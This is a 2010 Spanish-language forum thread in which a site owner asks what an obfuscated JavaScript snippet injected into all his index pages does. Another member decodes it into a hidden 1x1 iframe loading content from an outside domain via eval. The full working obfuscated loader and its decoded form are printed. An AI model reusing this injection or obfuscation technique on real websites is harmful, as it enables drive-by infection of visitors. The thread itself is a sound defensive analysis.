elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Ataque web por javascript
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ataque web por javascript  (Leído 2,728 veces)
Gorky


Desconectado Desconectado

Mensajes: 770



Ver Perfil WWW
Ataque web por javascript
« en: 6 Julio 2010, 12:14 pm »

Buenas foreros. Me he encontrado con un ataque en mi web y ha sido que los archivos index.php e index.html de todas las carpetas tenian este script al final del code:
Código
  1. <b id="glavnoelubovz">St<i>ri</i>n<i>g|<i>sp<i>li<i>t|f<i>rom<i>Ch<i>a</i>rC</i>o</i>d</i>e</i>|</i>ev</i>al</b>
  2. <script>
  3. function glavnoelubovc(node) {
  4.  var ret = "";
  5.  for(var i=0; i<node.childNodes.length; i++) {
  6.     switch(node.childNodes[i].nodeType) {
  7.    case 1: ret+=glavnoelubovc(node.childNodes[i]); break;
  8.    case 3: ret+=node.childNodes[i].nodeValue;
  9.  }
  10.  }
  11.  return ret;
  12. }
  13.  
  14. var glavnoelubov = glavnoelubovc(document.getElementById("glavnoelubovz")).split("|");
  15.  
  16. </script>
  17. <script>
  18. window[glavnoelubov[3]]("glavnoelubov_DGicyJZczU = "+glavnoelubov[0]);
  19. var glavnoelubov_pioRCoumcR = " a 100 a 111 a 99 a 117 a 109 a 101 a 110 a 116 a 46 a 119 a 114 a 105 a 116 a 101 a 40 a 34 a 60 a 105 a 102 a 114 a 97 a 109 a 101 a 32 a 115 a 114 a 99 a 61 a 39 a 104 a 116 a 116 a 112 a 58 a 47 a 47 a 117 a 105 a 116 a 121 a 114 a 46 a 105 a 110 a 47 a 120 a 47 a 105 a 110 a 100 a 101 a 120 a 46 a 112 a 104 a 112 a 63 a 115 a 61 a 100 a 97 a 50 a 52 a 50 a 99 a 100 a 49 a 50 a 102 a 98 a 48 a 50 a 102 a 50 a 97 a 48 a 51 a 54 a 102 a 53 a 57 a 52 a 50 a 53 a 50 a 48 a 100 a 97 a 49 a 99 a 57 a 39 a 32 a 119 a 105 a 100 a 116 a 104 a 61 a 49 a 32 a 104 a 101 a 105 a 103 a 104 a 116 a 61 a 49 a 32 a 102 a 114 a 97 a 109 a 101 a 98 a 111 a 114 a 100 a 101 a 114 a 61 a 48 a 62 a 60 a 47 a 105 a 102 a 114 a 97 a 109 a 101 a 62 a 34 a 41 a 59";
  20. var glavnoelubov_BKyPlsuSlj = glavnoelubov_pioRCoumcR[glavnoelubov[1]](" "+"a"+" ");
  21. var glavnoelubov_ShdAeHXubi = "";
  22. for (var glavnoelubov_lQQZiTNcFq=1; glavnoelubov_lQQZiTNcFq<glavnoelubov_BKyPlsuSlj.length; glavnoelubov_lQQZiTNcFq++){glavnoelubov_ShdAeHXubi+=glavnoelubov_DGicyJZczU[glavnoelubov[2]](glavnoelubov_BKyPlsuSlj[glavnoelubov_lQQZiTNcFq]);}
  23. window[glavnoelubov[3]](glavnoelubov_ShdAeHXubi);
  24. </script>

Alguien podria decirme que hace tal script?
Muchas gracias.
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: Ataque web por javascript
« Respuesta #1 en: 6 Julio 2010, 13:46 pm »

El primer Script, solo realiza un split a una cadena.
Código:
Cadena = String|split|fromCharCode|eval
Split = String,split,fromCharCode,eval

El segundo no lo sé, no lo vi :P
« Última modificación: 6 Julio 2010, 13:48 pm por shellroot@alex-laptop:~$ » En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
cgvwzq

Desconectado Desconectado

Mensajes: 57


Agente P.


Ver Perfil WWW
Re: Ataque web por javascript
« Respuesta #2 en: 6 Julio 2010, 15:20 pm »

Después de hacer el split a la cadena de números, con " a ", pasa cada uno a su correspondiente ascii con fromCharCode y lo concatena. El resultado es el siguiente:

Código
  1. document.write("<iframe src='http://uityr.in/x/index.php?s=da242cd12fb02f2a036f5942520da1c9' width=1 height=1 frameborder=0></iframe>");
  2.  

Se lo pasa a un eval() y se ejecuta...

No puedo decirte que hay en esa web porque me redirecciona a un 404, puede ser que ya hayan suspendido la página maliciosa, o que compruebe que el "Referrer" es de una página comprometida.

Saludos!
En línea

Some stuff:

  • www.a] parsed as ]www.a]
  • Bypass elhacker's img filter with ALT attribute!
  • ¿Para cuándo SQLi I y II? WZ


Gorky


Desconectado Desconectado

Mensajes: 770



Ver Perfil WWW
Re: Ataque web por javascript
« Respuesta #3 en: 6 Julio 2010, 16:00 pm »

Después de hacer el split a la cadena de números, con " a ", pasa cada uno a su correspondiente ascii con fromCharCode y lo concatena. El resultado es el siguiente:

Código
  1. document.write("<iframe src='http://uityr.in/x/index.php?s=da242cd12fb02f2a036f5942520da1c9' width=1 height=1 frameborder=0></iframe>");
  2.  

Se lo pasa a un eval() y se ejecuta...

No puedo decirte que hay en esa web porque me redirecciona a un 404, puede ser que ya hayan suspendido la página maliciosa, o que compruebe que el "Referrer" es de una página comprometida.

Saludos!

Te agradezco tu investigacion. Tampoco se que es lo que hay tras esa web pero si es cierto que el kaspersky me lo bloquea.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines